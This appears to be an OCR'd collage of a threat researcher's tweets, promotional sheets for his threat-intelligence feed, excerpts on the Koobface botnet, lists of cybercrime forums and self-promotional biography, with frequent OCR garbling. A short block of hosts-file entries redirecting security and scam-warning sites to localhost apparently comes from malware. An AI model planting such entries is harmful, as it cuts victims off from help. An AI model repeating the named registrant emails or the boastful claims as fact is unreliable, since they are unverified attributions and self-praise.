#Threatintel #ThreatHunting #ThreatResearch https://t.co/2kvm87d9Ds 


Cyber 
Intelligence 


18 - Tuesday 


02:15 


https://t.co/WIBGTU5ryT #security #cybercrime #malware #CyberAttack 
#CyberSecurity #CyberSecurityAwareness #cybersecuritytips #Threatintelligence 
#ThreatHunting #threatintel https://t.co/5kxAAJ56Hz 
22 - Saturday


09:22 


Quote of the day - "Communications without intelligence is noise. Intelligence 
without communications is irrelevant." Cheers and thanks @Cryptome_org for 
mentioning my research! #security #cybercrime #malware #CyberSecurity 
#Threatintelligence #Threatintel https://t.co/TT2cvYcyLM 


27 *5 
Image 4 : Electronic Warfare (ELINT) 2
Image 6 : NCW Attack Formation


23 - Sunday 


07:46 


What "we" do in the Lab circa 2022! Big thanks to my ex-employer @Webroot for 
making this happen! Anyone who says "thanks" and "congrats" gets a "harassment" 
visit by me looking for you at a major security conference. Be cool! 
https://t.co/emQDx3fyF6 
07:46


What "we" do in the Lab circa 2022! Big thanks to my ex-employer @Webroot for 
making this happen! Anyone who says "thanks" and "congrats" gets a "harassment" 
visit by me looking for you at a major security conference. Be cool! 
https://t.co/ioYFJ9QABv 
07:47


What "we" do in the Lab circa 2022! Big thanks to my ex-employer @Webroot for 
making this happen! Anyone who says "thanks" and "congrats" gets a "harassment" 
visit by me looking for you at a major security conference. Be cool! 
https://t.co/PNPUYFefCl 


07:47 


What "we" do in the Lab circa 2022! Big thanks to my ex-employer @Webroot for 
making this happen! Anyone who says "thanks" and "congrats" gets a "harassment" 
visit by me looking for you at a major security conference. Be cool! 
https://t.co/ucteefQdbv 




07:48 


What "we" do in the Lab circa 2022! Big thanks to my ex-employer @Webroot for 
making this happen! Anyone who says "thanks" and "congrats" gets a "harassment" 
visit by me looking for you at a major security conference. Be cool! 
https://t.co/xGLc5vIPze 
27 - Thursday


05:58 


https://t.co/JIcqObfRwr #security #cybercrime #malware #CyberAttack 
#cyberattacks #cybersecuritytips #CybersecurityNews #ThreatHunting 
#Threatintelligence https://t.co/oTqtlPtkyD 
Dancho Danchev's Blog - Mind Streams of
Information Security Knowledge


This blog covers trends and fads, tactics and strategies, intersecting with speculations and real-time CYBERINT assessments, all packed with sarcastic attitude


07:45


"We" - my employer @whoisxmlapi and I are going public with this next week. It will
go live here - https://t.co/tYYVSZW9zo where I’m acting as a DNS Threat Researcher 
since January, 2021. Stay tuned and grab an account today! #threatintel 
#threatintelligence https://t.co/204hdT5So0Y 
Dancho Danchev Presents


The International
OSINT Journal
Compilation on

Online T


Hate and ed
Social M 5


The Definite OSINT and Actionable Threat Intelligence
Compilation Guide to Assist Law Enforcement and the U.S
Intelligence Community Internationally


Dancho Danchev


https://ddanchev.blogspot.com Email: dancho.danchev@hush.com


08:17 


@virusbtn Congrats! This is me in a previous life - https://t.co/uaLnPImMxET almost 
reaching 11,000 followers and for the record make sure you don’t end up here - 
https://t.co/KXVoOMMFaeW although this should be considered a privilege. Keep up the 
good work! Dancho 


08:27 


@rickhholland I have another perspective and it works - https://t.co/3UzZ7SeRhSI two
models here - "everything that has already been seen is already there" meaning you 
just have to connect the dots and "Google is your best friend" #CTISummit 


*1 
08:30 


@rickhholland Good point. The bad guys are also sometimes "lazy". Here are some 
slides on attribution and OPSEC failures by the bad guys here - 
https://t.co/QWTfUhDxyC and hey this is 2007. #CTISummit 


21 *%2 
08:33 
@rickhholland Could data sets collected in real time or periodic basis do the magic? 


https://t.co/rgsEandTx7 you bet! Here are some findings based on data mining my 
own data set - https://t.co/RVOQQwEwwg #CTISummit 


08:38 


@rickhholland Think big. Forget about everyone. Go public with as much details as 
possible. Then pop up at a security event or a conference and take the blame for 
having everyone greeting you and saying "hi" Here’s an example - 
https://t.co/VAngqQkjJd #CTISummit 


08:40 


@rickhholland @cybereason You’re the team and then the whole team becomes one. 
What everyone on your team should consider and act like a one man operation while 
the whole team or you in particular would take the "blame" and all the credit for all 
the hard work. #CTISummit 


*1 


28 - Friday 


00:57 


A podcast with me for my employer @whoisxmlapi where I’m acting as a DNS Threat 
Researcher since January, 2021 - https://t.co/MDkvbEPrT6 Enjoy! #security 
#cybercrime #malware #CyberAttack #cyberattacks #CyberSec #ThreatiIntel 
#Threatintelligence 


29 - Saturday 


07:49 


@Treadstone71LLC Jeffrey. I just send you an email. Ping me back when you read it.
Regards. Dancho (https://t.co/JTcqOaYgET) 


11:08 


Folks. This is Dancho (https://t.co/JTcqOaYgET). Who wants to obtain free access to 
my 96GB Cybercrime Forum Data Set for 2021 part of my Law Enforcement and 
OSINT Operation "Uncle George" - https://t.co/RVOQQwEwwg drop me a line at 

dancho.danchev@hush.com https://t.co/2h02KLyj2p 


Cybercrime Forum 
Data Set 2021 


FULL OFFLINE COPIES OF OVER 11) PUBLICLY 
ACCESSIBLE FORUM 
COMMUNITIES! LET'S SET THEM 


dancho.danchev@hush.com


February 


1 - Tuesday 


01:36 


Check out my latest research for @whoisxmlapi on the InFraud Organization bust - 
https://t.co/mGFQOGBB4Y #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cybersecuritytips #ThreatIintelligence #threatreport 
03:13 


The InFraud Organization. Check out the slides here - https://t.co/QWTfUhDxyC and 
hey it’s 2007! CC: @ProjectHoneynet and here are the technical details - 
https://t.co/9IWM9nHOZH Cheers! #security #ThreatHunting #Threatintelligence 
#threatreport 
22 2 
03:55 


Check out this @MaltegoHQ tutorial on the recent InFraud organization bust - 
https://t.co/jQkJq5Y800 including all the technical details. This is a video courtesy of 
me for @whoisxmlapi stay tuned for more! The details - https://t.co/9IWM9nHOZH 


23 4 


3 - Thursday 


00:05 


Check out this @MaltegoHQ OSINT tutorial - https://t.co/s3EVCIZTkK courtesy of me 
for @whoisxmlapi where I do cyber threat actor infrastructure mapping using Maltego
on FBI’s Most Wanted - SecondEye Solutions company. Enjoy! #Threatintelligence 
#OSINT 


*1 


4 - Friday 


05:37 


https://t.co/YvxKO3WTUw #security #cybercrime #malware #CyberSecurity 
#CyberAttack #Threatintel #Threatintelligence https://t.co/ICcmu8QNlv 


22 %3 


People OSINT Attribution Techniques 


How can OSINT be applied to People Cyber Attack Attribution Techniques? 


What are the most popular and recommended OSINT techniques for doing people attribution to cyber attack 
campaigns? 


15:57 


Who is Dancho Danchev? - https://t.co/dcUrKPM6hz #security #cybercrime 
#malware #CyberSecurity #CyberAttack #cyberattacks #Threatintel 
#Threatintelligence #threatreport 
5 - Saturday


10:39 


Grab the torrent! For free! Enter the bold new world of data mining hundreds of 
publicly accessible cybercrime-friendly forum communities and improve your 
situational awareness in the world of cybercrime fighting - https://t.co/KOOtL33ynk 
[torrent] https://t.co/Mal5800YPk 
<parent>        Darkmoney        iHonker               ShadowMarket
11Wang          DarkWeb          LinkFeed              SkyFraud
365Exe          DomenForum       Linuxac.org           Spyhackerz
419eater        Eviloctal        Master-X              Svuit.vn
4HatDay         Exelab           MasterWebs            Szenebox
aHack           Forum-UINSell    MaulTalk              Szuwi
Aljyyosh        Forum.Zloy.bz    Mmpg.ru               Tenebris
Antichat.ru     ForumSape        Mr11-11mr.7olm.org    TheBot
ArmadaBoard     ForumSEO         Nullnoss.org          Toolbabase.se
BigFozzy        Free-hack        pay-per-install.org   TotalBlackhat
BlackhatWorld   ghostmarket.net  PhreakerPro           Turkhackteam
BPCForum        Gla.vn           Piratebuhta.pw        Vsehobby
Cardvilla       GoFuckBiz        ProCrd                Webmasters.ru
Chf             gofuckbiz.com    ProLogic              Whitehat.vn
CNHonker        H4kurd.com       Promarket             WWH-Club
CNSec           Hack-Port        ProxyBase             www.opensc.ws
Crack-Forum     Hackersoft       scamwarners           Xakep.bg
Cracked.to      Hackingboard     SEOCafe               Xakepok
Cyberizm        Hackings         SEOForum              Zismo
Darkmarket.la   iFud


10:40 


Here’s a compilation of all of my publicly accessible research in the form of a torrent. 
Grab a copy today! - https://t.co/zLxOBiAf]M [torrent] #security #cybercrime 
#malware #CyberSecurity #cybersecuritytips #Threatintel #ThreatHunting 

#threatintelligence 
11:18
@GregoryDEvans Thanks for the link! 


8 - Tuesday 


14:18 


Who's running their own MISP - Open Source Threat Intelligence Platform instance? 
Drop me a line at dancho.danchev@hush.com #security #cybercrime #malware 
#CyberSecurity #CyberAttack #Threatintel #ThreatHunting #Threatintelligence 


23 *4 
14:19 


Who wants to hook themselves to my MISP - Open Source Threat Intelligence 
Platform? Free API keys offered for consumption! Drop me a line at 
dancho.danchev@hush.com 
*1


9 - Wednesday 


04:28 


Who loves Threat Intelligence? https://t.co/8BBKUOX5FSx #security #cybercrime 
#malware #CyberAttack #CyberSecurity #cyberattacks #CyberSecurityAwareness 
#Threatintelligence #threatreport #MISP #Maltego #OSINT 


2 
04:33 
Retweet please! https://t.co/8BkKUOXmIUx #security #cybercrime #malware 


#CyberSecurity #CyberAttack #cyberattacks #CyberSecurityAwareness 
#Threatintelligence #threatreport #MISP #Maltego #OSINT 


05:47 


Ping me for API access here - https://t.co/8BKUOX5FSx #security #cybercrime 
#malware #CyberSecurity #CyberAttack #CyberSecurityAwareness 
#Threatintelligence #threatreport #MISP #Maltego #OSINT 


*2 
15:10 


https://t.co/LErVobxSGp #security #cybercrime #malware #CyberSecurity 
#CyberAttack #ThreatIntelligence #threathunting #threatreport #threatintel 


22 


15:48 


As of today I’m starting to post on Twitter on an hourly and daily basis in order to 
attract users that includes vendors and organizations for my #MISP instance. 
https://t.co/LErVobxSGp #Threatintelligence #threathunting #threatreport 
#threatintel 


15:54 
https://t.co/LErVobxSGp #security #cybercrime #malware #CyberSecurity 


#CyberAttack #Threatintelligence #threathunting #threatreport #threatintel #MISP 
#Maltego #OSINT https://t.co/DuzSIGrs71 


15:54 


https://t.co/LErVobxSGp #security #cybercrime #malware #CyberSecurity 
#CyberAttack #Threatintelligence #threathunting #threatreport #threatintel #MISP 
#Maltego #OSINT https://t.co/P1V3ISHEA7 


15:54 


https://t.co/LErVobxSGp #security #cybercrime #malware #CyberSecurity 
#CyberAttack #Threatintelligence #threathunting #threatreport #threatintel #MISP 
#Maltego #OSINT https://t.co/a55Xo030ZrA 




15:54 


https://t.co/LErVobxSGp #security #cybercrime #malware #CyberSecurity 
#CyberAttack #Threatintelligence #threathunting #threatreport #threatintel #MISP 
#Maltego #OSINT https://t.co/b3c2cdkLGI 




15:55 


https://t.co/LErVobxSGp #security #cybercrime #malware #CyberSecurity 
Competitors


Identified Competitors

* Cyber Defense Agency (CDA) (US)
* Cyber Security Research and Development Center (US)
* Cyveillance (US)
* Dancho Danchev (EU)
* Department of Homeland Security US-CERT (US)
* Ernst & Young (EU)
* EWA Information and Infrastructure Technologies, Inc. (US)
* Fortify (US)
* Global Security Mag (EU)
* iDefense Labs (US)
* JET Intelligent Risk Systems (US)
* Informatica (US)
* IT-Information Sharing and Analysis Center (US)
* iSIGHT Partners (US)
* Lookingglass (US)
* Multi-State Information Sharing Analysis Center (US)
* nCircle (US)
* SecureWorks (US)
* Trend Micro (US)
* United States Cyber Consequence Unit (US)
You Retweeted

NETRESEC @netresec
Our #SUNBURST STAGE2 Victim Table (orgs actively targeted by the threat actor) has now been updated to include “paloaltonetworks*". The internal AD domain for GUID 22334A7227544B1E was discovered in passive DNS data published by @dancho_danchev.

[Table columns: avsvmcloud.com Subdomain, Timestamp (UTC), AD Domain]
Our team, so often called “Koobface Gang", expresses high gratitude for the help in bug fixing, researches and documentation for our software to:

* Kaspersky Lab for the name of Koobface and 25 millionth malicious program award;

* Dancho Danchev (http://ddanchev.blogspot.com) who worked hard every day especially on our First Software & Architecture version, writing lots of e-mails to different hosting companies and structures to take down our Command-and-Control (C&C) servers, and of course analyzing software under VM Ware;

* Trend Micro (http://trendmicro.com), especially personal thanks Jonell Baltazar, Joey Costoya, and Ryan Flores who had released a very cool document (with three parts!) describing all our mistakes we've ever made;

* Cisco for their 3rd place to our software in their annual “working groups awards";

* Soren Siebert with h

* Hundreds of users who send us logs, crash reports, and wish-lists.


In fact, it was a really hard year. We've made many efforts to improve our software. Thanks to Facebook's security team - the guys made us move ahead. And we've moved. And will move. Improving their security system.


By the way, we did not have a cent using Twitter's traffic. But many security issues tell the world we did. They are wrong.

As many people know, “virus” is something awful, which crashes computers, steals credential information as good as all passwords and credit cards. Our software did not ever steal credit card or online bank information, passwords or any other confidential data. And WILL NOT EVER. As for the crashes... We are really sorry. We work on it :)


Wish you a good luck in new year and... Merry Christmas to you!


Always yours, “Koobface Gang”.
C&C ARCHITECTURE


Compared with the complex C&C architecture of the Storm, WALEDAC, and DOWNAD botnets, the KOOBFACE C&C infrastructure is very basic. It only consisted of infected nodes and C&C domains that used HTTP as its communication protocol.


Figure 40. KOOBFACE C&C prior to July 19, 2009
Figure 41. Updated KOOBFACE C&C as of July 19, 2009


This simplistic C&C approach is, of course, very vulnerable to takedowns. After several KOOBFACE C&C takedown attempts initiated by Internet service providers (ISPs) and members of the security industry, the KOOBFACE gang realized the need for a more robust C&C infrastructure. Thus, on July 19, 2009, the KOOBFACE writers implemented a new C&C architecture that involved the use of proxy nodes to provide redundancy and to improve the survivability of their C&C should another takedown be attempted.


A few days after the new KOOBFACE C&C infrastructure was implemented, the botnet was seen inserting a message (see below) for one of the security researchers tracking the malware’s domain activities.
February 15, 2011


SC Social Media Awards


Best Security Blogger: Graham Cluley, senior technology consultant at Sophos, for the Naked Security Blog


Best Corporate Security Blog: Trend Micro’s TrendLabs Malware Blog


Five to Follow on Twitter:

* @cyberwar and @stiennon (Richard Stiennon, chief research analyst of IT-Harvest)
* @George_KurtzCTO (George Kurtz, worldwide CTO of McAfee)
* @danchodanchev (Dancho Danchev, independent security consultant)
* @jeremiahg (Jeremiah Grossman, founder and CTO of WhiteHat Security)
* @owasp (the Open Web Application Security Project)
hilary kneber @hilarykneber - Jan 16, 2011
#DANCHO DANCHEV Does anyone know ..Is there a way I can determine
the exact date that Dancho Danchev began to “unfollow" me?
Dancho Danchev


Dancho Danchev is the world’s leading expert in the field of 
cybercrime fighting and threat intelligence gathering having 
actively pioneered his own methodology for processing 
threat intelligence leading to a successful set of hundreds 
of high-quality analysis and research articles published at 
the industry's leading threat intelligence blog - ZDNet's Zero 
Day, Dancho Danchev's Mind Streams of Information Security 
Knowledge and Webroot's Threat Blog with his research 
featured in Techmeme, ZDNet, CNN, PCWorld, SCMagazine, 
TheRegister, NYTimes, CNET, ComputerWorld, H+Magazine 
currently producing threat intelligence at the industry's 
leading threat intelligence blog - Dancho Danchev's - Mind 
Streams of Information Security Knowledge which has 
received over 5.6M page views since December, 2005 and 
is currently considered one of the security industry's most 
popular security publications. 


- Presented at the GCHQ with the Honeynet Project 

- SCMagazine Who to Follow on Twitter for 2011 

- Participated in a Top Secret GCHQ Program called “Lovely 
Horse” 

- Identified a major victim of the SolarWinds Attack - 
PaloAltoNetworks 

- Found malware on the Web Site of Flashpoint

- Tracked monitored and profiled the Koobface Botnet and 
exposed one botnet operator 

- Made it to Slashdot two times 

- My Personal Blog got 5.6M Page Views Since December, 
2005 


- My old Twitter Account got 11,000 followers 

- I had an average of 7,000 RSS readers on my blog

- I have my own vinyl “Blue Sabbath Black Cheer / Griefer -
We Hate You / Dancho Danchev Suck My Dick” made by a 
Canadian artist 

- Currently running Astalavista, box.sk 

- I gave an interview to DW on the Koobface Botnet 

- I gave an interview to NYTimes on the Koobface botnet

- I gave an interview to Russian OSINT 

- Listed as a major competitor by Jeffrey Carr's Taia Global 
- Presented at the GCHQ 

- Presented at Interpol 

- Presented at InfoSec 

- Presented at CyberCamp 

- Presented at RSA Europe 


He's currently running a high-profile hacking and s' 
project on the original https://astalavista.box.sk an 
reached at dancho.danchev@hush.com 
127.0.0.1 bobbear.co.uk
127.0.0.1 reed.co.uk
127.0.0.1 seek.com.au
127.0.0.1 scam.com
127.0.0.1 scambusters.org
127.0.0.1 www.quardian.co.uk
127.0.0.1 ddanchev.blogspot.com
127.0.0.1 aic.gov.au
127.0.0.1 google.com.au
127.0.0.1 www.reed.co.uk
Feed Stats Dashboard
Wednesday, December 14, 2005 — Saturday, September 14, 2019
* 2,888 subscribers (on average)
* 457 reach (on average)

Popular Feed Items
NAME                                                    VIEWS       CLICKS
Total                                                   1,557,394   6,377,221
Historical OSINT - Malicious Malvertising Campaig...    1463        71028
Historical OSINT - Massive Black Hat SEO Campaign...    1397        70766
Historical OSINT - Google Docs Hosted Rogue Chrom...    1402        70669
Table 9: Quality of selected a sources (10 out of 45)


of 
noni robust 
iocterms 10Cs 


TuoSecurity 
Sucuri 
PaloAlto 
Malwarebytes 
Hexacorn 
Targeted Client-Side Exploits Serving Campaigns Utilize the WebAttacker Web Malware Exploitation Kit

Multiple Targeted MPack Client-Side Exploits Serving Campaigns Spotted in the Wild

U.S Consulate St. Petersburg Serving Malware

Fraudulent EBay Impersonating Phishing Campaign Spotted in the Wild

Fraudulent PayPal Impersonating Phishing Campaign Spotted in the Wild

Syrian Embassy in London Serving Malware

Malicious Client-Side Exploits Serving Campaign Drops MMORPG Password Stealers

Multiple Client-Side Exploits Serving Campaigns Utilize the n404 Exploit Kit

Bank of India Web Site Compromised Leads to Client-Side Exploits and Malware

Fraudulent Rock Phish Gang Phishing Campaign Spotted in the Wild

Malicious Client-Side Exploits Serving Campaign Utilizes IcePack Web Malware Exploitation Kit for Fraudulent and Malicious Purposes

World of Warcraft Phishing Campaign Spotted in the Wild

Targeted Client-Side Exploits Serving Campaign Spotted in the Wild

Targeted Client-Side Exploits Serving Campaign Spotted in the Wild

Targeted MPack Client-Side Exploits Serving Campaign Spotted in the Wild

Russian Business Network Mass iFrame Campaign

Fake Adult Content Themed Web Sites Spreading Malicious Carpediem Group Dialers Spotted in the Wild
Event Event Event
houda-taineaGrcomad com azerxca@pmal.com


OsanaSenlaces! Ghotmad com 


rabh_atzubarGhotmai com 


fapot@gmai.com estalvesky@hotmai.com 
Event Event Event


sous ou@live.fr houds-takw s@hotmail.com 8zezaxxs@gmail.com 


I se @ 


= - Os ameBenLaden1@hotmail.com 


fay05@gmail.com estalvesky@hotmail.com 
* Cyber Attribution WHOIS Registrant Email
* Cyber Jihad Domain
* Cyber Jihad Domain Responding IPs
* Cyber Jihad Internet Infrastructure
* Cyber Terrorism Domain

* Cyber Terrorism
* Cyber Terrorism Domain
* Cyber Terrorism Domain Responding IPs
* Cyber Terrorism Internet Infrastructure

* Cyber Jihad
* Cyber Jihad Domain
* Cyber Jihad Domain Responding IPs
* Botnet
* Client-Side Exploits
* Drive By Download
* Exploits
* TDS
* TDS (Traffic Distribution System)
* Traffic Distribution System
* Vulnerabilities

* Botnet
* DGA Botnet Command and Control
* DGA Botnet Command and Control Infrastructure
* Drive By Download
* Fast Flux
* Fast Flux Botnet
* Storm Worm Botnet
Attack Pattern
* Buy domain name - T1328
* Acquire and/or use 3rd party infrastructure services - T1329
* Acquire and/or use 3rd party software services - T1330


12 - Saturday 
Who needs a niche STIX STIX2 TAXII IoCs (Indicator of Compromise) feed? Unique
Threat Actors specific threat intelligence guaranteed. https://t.co/OmUajr8DT8 
#ThreatHunting #Threatintelligence #STIX #STIX2 #TAXII #IOC 
https://t.co/80S7j6kYmg 
https://t.co/QbTOfuYY2p #security #cybercrime #malware #cyberattacks
#cybersecuritytips #ThreatHunting #Threatintelligence #STIX #STIX2 #TAXII #IoC


222 2 
15:55 
STIX/STIX2/TAXII Feed! - https://t.co/Bqbi2IDib5 Brochure - https://t.co/sEIhv2bb8t 


[PDF] #security #cybercrime #malware #CyberAttack #cyberattacks 
#ThreatHunting #Threatintelligence #threatintel #STIX #STIX2 #TAXII #IoC


23 2 
20:37 
Free STIX STIX2 TAXII feed for research! - https://t.co/OmUajr8DT8 Brochure - 


https://t.co/LZtRAVGOBe #security #cybercrime #malware #CyberAttack #CyberSec 
#ThreatHunting #Threatintelligence #Threatintel https://t.co/B5LZ3QmU2G 
13 - Sunday


06:58 


If you believe in historical #OSINT and that data is everything in terms of "connecting 
the dots" in the world of cybercrime fighting - check out my STIX STIX2 and TAXII 
feed - https://t.co/OmUajr8DT8 Brochure - https://t.co/sElhv2bb8t [PDF] 
https://t.co/Gb5tGtaN2l 




08:57 


15 years of STIX STIX2 TAXII compatible niche threat actor specific API feed! - 
https://t.co/OmUajr8DT8 Brochure - https://t.co/sElhv2bb8t #security #cybercrime 
#malware #ThreatHunting #Threatintelligence #threatintel RT pls! 
13:56 


https://t.co/KROkKbHSO3e #ThreatHunting #Threatintelligence #threatintel #STIX 
https://t.co/1I1rdiUKDeUA 
16:09


https://t.co/OmUajr8DT8 #ThreatHunting #Threatintel #Threatintelligence 
https://t.co/R2ZMxkKItZ 


14 - Monday 


20:07 


https://t.co/OmUajr8DT8 - free STIX STIX2 TAXII compatible threat actor specific 
threat intelligence feed for research purposes! 15 years of "connecting the dots" now 
in machine readable format! https://t.co/sElhv2bb8t #Threatintel #Threatintelligence 
https://t.co/g4eCRTaPHK 


21 %*1 


Need Niche Threat Actor Specific STIX/STIX2/TAXII Compatible IoCs and Threat Intelligence Feed?


Threat Intelligence Feed Overview


20:10 


https://t.co/OmUajr8DT8 - Brochure - https://t.co/sElhv2bb8t [PDF] #Security 
#cybercrime #Malware #infosec #informationsecurity #Threatintel 
#Threatintelligence #threatreport #OSINT #STIX #STIX2 #TAXII #OpenCTI
https://t.co/WHCHPxoHgH 


23 *%5 


15 - Tuesday 


12:18 


https://t.co/MuWtj6BBD9 #security #cybercrime #malware #cyberattacks 
#CyberAttack #cybernews #Threatintel #ThreatHunting #ThreatIntelligence 


17 - Thursday 


11:05 


Free Lifetime API Key - f8aaO0cca-a0ac-4eff-9c03-1c86ad7aee93 for my STIX STIX2 
TAXII feed - https://t.co/nmyFy5H3nvV start pulling today! TAXII Collection - 
https://t.co/VVVF5pIV60 For free! Lifetime! CC: @Anomali @LogRhythm 
@PaloAltoNtwks @TrendMicro https://t.co/4bU2zdsWdm 
A List Of Hezbollah Domains


A List Of Cyber Jihad Domains


Dancho Danchev


13:42 
https://t.co/58vnX3ZjdH #security #cybercrime #malware #CyberSecurity 


#cyberattacks #ThreatHunting https://t.co/zyFgnd80Hb 


13:43 
https://t.co/nbH5pe9awi #security #cybercrime #malware #CyberSecurity 


#cyberattacks #ThreatHunting https://t.co/SlgvbQyRoQ 
18 - Friday


18:12 


https://t.co/58vnX3ZjdH #security #cybercrime #malware #cyberattacks 
#CyberAttack #cyberthreats #CybersecurityNews #Threatintel #Threatintelligence 
#ThreatHunting #threatresearch #threatreport #STIX #STIX2 #TAXII 
https://t.co/jcnzSYBBW1 
18:19


https://t.co/58vnX3ZjdH #security #cybercrime #malware #CyberAttack 
#cyberattacks #cyberthreats #Threatintel #Threatintelligence #ThreatHunting 
#threatresearch #threatreport #STIX #STIX2 #TAXII https://t.co/CaqlTdVAu7 
18:19


https://t.co/58vnX3ZjdH #security #cybercrime #malware #CyberAttack 
#cyberattacks #cyberthreats #Threatintel #Threatintelligence #ThreatHunting 
#threatresearch #threatreport #STIX #STIX2 #TAXII https://t.co/iAP4enZvFF 
STIX2 Attack Pattern

STIX2 Campaign
A Campaign is a grouping of adversary behavior that desc

STIX2 Course Of Action
A Course of Action is an action taken either to prevent an attack or to respond

STIX2 Grouping
A Grouping object explicitly

STIX2 Identity
Identities can represent actual individuals, org

STIX2 Incident
The incident object in S

STIX2 Indicator
Indicators contain a pattern that can b

STIX2 Infrastructure
infrastructure obj

STIX2 Intrusion Set
An Intrusion Set is a

STIX2 Location
A Location represents a geographic location

STIX2 Malware Analysis
Malware Analysis captures the metad

STIX2 Malware
Malware is a type of TTP that is also known

STIX2 Note
A Note is a comment or note con

STIX2 Observed Data
Observed data conveys information that was observed on systems and

STIX2 Opinion
An Opinion is an as

STIX2 Report
Reports are collections of

STIX2 Threat Actor
Threat Actors are actual individuals, group


18:19 


https://t.co/58vnX3ZjdH #security #cybercrime #malware #CyberAttack 
#cyberattacks #cyberthreats #Threatintel #Threatintelligence #ThreatHunting 
#threatresearch #threatreport #STIX #STIX2 #TAXII https://t.co/3BN1sEfcva 




18:20 


https://t.co/58vnX3ZjdH #security #cybercrime #malware #CyberAttack 
#cyberattacks #cyberthreats #Threatintel #Threatintelligence #ThreatHunting 
#threatresearch #threatreport #STIX #STIX2 #TAXII https://t.co/VuDGKAOpGx


18:20 


https://t.co/58vnX3ZjdH #security #cybercrime #malware #CyberAttack 
#cyberattacks #cyberthreats #Threatintel #Threatintelligence #ThreatHunting 
#threatresearch #threatreport #STIX #STIX2 #TAXII https://t.co/IJTFskai4T 
19 - Saturday


15:46 


Who pulled my STIX STIX2 TAXII feed already? - https://t.co/58vnX3ZjdH did you 
"connect the dots"? Stay tuned for massive volume of daily updates and consider 
embedding it in your #Threatintelligence solution or firewall software. 


15:54 


https://t.co/58vnX3ZjdH #security #cybercrime #malware #CyberAttack 
#cyberattacks #CyberSec #Threatintelligence https://t.co/mQ8guFpxoQ 


Sample Logo of Dancho Danchev’s OpenCTI STIX2/TAXII Maltego Transforms Compatible OpenCTI Instance Processing Hundreds of Never Published and Discussed Before Cybercrime Incidents and Threat Intelligence Events 


15:54 


https://t.co/58vnX3ZjdH #security #cybercrime #malware #CyberAttack 
#cyberattacks #CyberSec #Threatintelligence https://t.co/o4YdYDbFwM 


[Image: category list: Malware, Cyber Jihad, Cyber Terrorism, Threat Actors, Phishing, Spam, IM malware, Mobile malware, Mac OS X malware]


15:55 


https://t.co/58vnX3ZjdH #security #cybercrime #malware #CyberAttack 
#cyberattacks #CyberSec #Threatintelligence https://t.co/sjgdq99RJ3 


Approach us Today and Begin Using Our Repository of Information! 

Dancho Danchev - “We Make Cyber Intelligence Impact Where No One Has Been Before” 

Web Site: https://ddanchev.blogspot.com 
Email: dancho.danchev@hush.com - inquire Today About Your API Key! 

PGP Key 




15:55 
https://t.co/58vnX3ZjdH #security #cybercrime #malware #CyberAttack 
#cyberattacks #CyberSec #Threatintelligence https://t.co/jbHsYfr7hH 


- Malvertizing Campaigns and Incidents — Complete Qualitative and Incident and Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands of IoCs (Indicators of Compromise) and MD5s 
- The Koobface Botnet Monitored and Profiled — Complete Qualitative and Incident and Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands of IoCs (Indicators of Compromise) and MD5s 
- Social Networking Sites Malware Campaigns and Incidents — Complete Qualitative and Incident and Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands of IoCs (Indicators of Compromise) and MD5s 
- In-the-Wild Malware Analysis 
- Targeted Malware Analysis 
- Targeted Phishing Analysis 
- Malicious URL Analysis 
- Targeted Mobile Malware Analysis 
- APT Coverage 
- Fraudulent Infrastructure 
- Online Fraud Campaign 
- Historical OSINT Campaign 
- Russian Business Network coverage 
- Koobface Botnet coverage 
- Kneber Botnet coverage 
- Thousands of IOCs (Indicators of Compromise) 
- Tactics Techniques and Procedures In-Depth Coverage 
- Malicious and fraudulent infrastructure mapped and exposed 
- Malicious and fraudulent Blackhat SEO coverage 
- Malicious spam and phishing campaigns 
- Malicious and fraudulent scareware campaigns 
- Malicious and fraudulent money mule recruitment scams 
- Malicious and fraudulent reshipping mule recruitment scams 
- Web based mass attack compromise fraudulent and malicious campaigns 
- Malicious and fraudulent client-side exploits serving campaigns 


20 - Sunday 


04:38 


https://t.co/58vnX3ZjdH #security #cybercrime #malware #cyberattacks 
#CyberAttack #cybersecuritytips #threatreport https://t.co/INHqxJSOsB 


Need Niche Threat Actor Specific STIX/STIX2/TAXII Compatible IoCs and Threat Intelligence Feed? 

The World's Premier Threat Actor Specific and IoCs and In-House Analytical and Report-Based Driven Provider of the Industry's Best Niche STIX/STIX2/TAXII Compatible Threat Intelligence Feed 


04:50 


https://t.co/YSJFV4|jUn #security #cybercrime #malware #cyberattacks 
#CyberAttack #CyberSec #cybersecuritytips #Threatintelligence #threatreport 
https://t.co/cVLutBGMMW 


[Image: product data sheet with a list of cybercrime forum and community names]


04:55 


https://t.co/4CqIL2cSeH #security #cybercrime #malware #cyberattacks 
#CyberAttack #CyberSec #cybersecuritytips #Threatintelligence #threatreport 
https://t.co/M3xVJvX6jE 


[Image: screenshot of the blog "U.S Intelligence Community 2.0" by Dancho Danchev, with its "Recent Posts" and "Most viewed posts" sections]


04:59 
https://t.co/JTcqOaYgET https://t.co/gxRzUOm415 


04:59 
https://t.co/JTcqOaYgET https://t.co/6wqWT2hCSI 


https://t.co/JTcqOaYgET https://t.co/ 


04:59 


[Chart: "Dancho Danchev's Blog - Mind Streams of Information Security Knowledge", views over time, Jan 2011 to Jan 2019]


https://t.co/JTcqOaYgET https://t.co/zdKXhzu4ug 


Cyber Intelligence 


The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchev 


The RBN, The Koobface Botnet, The Rock Phish Gang, 
Spam Phishing and Malware Campaigns Including Botnet 
and Money Mule Recruitment Scams Traced Down to Their 
Source Including Various Underground Market Propositions 
Exposed 


https://ddanchev.blogspot.com 


Dancho Danchev 


05:00 
https://t.co/JTcqOaYgET https://t.co/5Eel8CCbeT 


05:00 


https://t.co/JTcqOaYgET https://t.co/qSEUlee8Y0 




05:00 


https://t.co/JTcqOaYgET https://t.co/veul5faUX} 


EXPOSING KOOBFACE: THE 


05:00 
https://t.co/JTcqOaYgET https://t.co/FdkB8fQhaKk 


05:00 


https://t.co/JTcqOaYgET https://t.co/M6QYN57WvM 


05:03 


https://t.co/JTcqOaYgET https://t.co/VyzwQrdapB 


DANCHO DANCHEV’S 
SECURITY RESEARCH 
FOR WEBROOT INC. 


Danchev's Security Research for 
Webroot Inc. Circa 2012-2014 


05:04 
https://t.co/JTcqOaYgET https://t.co/hfYHt6J3Fz 


Dancho Danchev Presents! Brace Yourselves! 

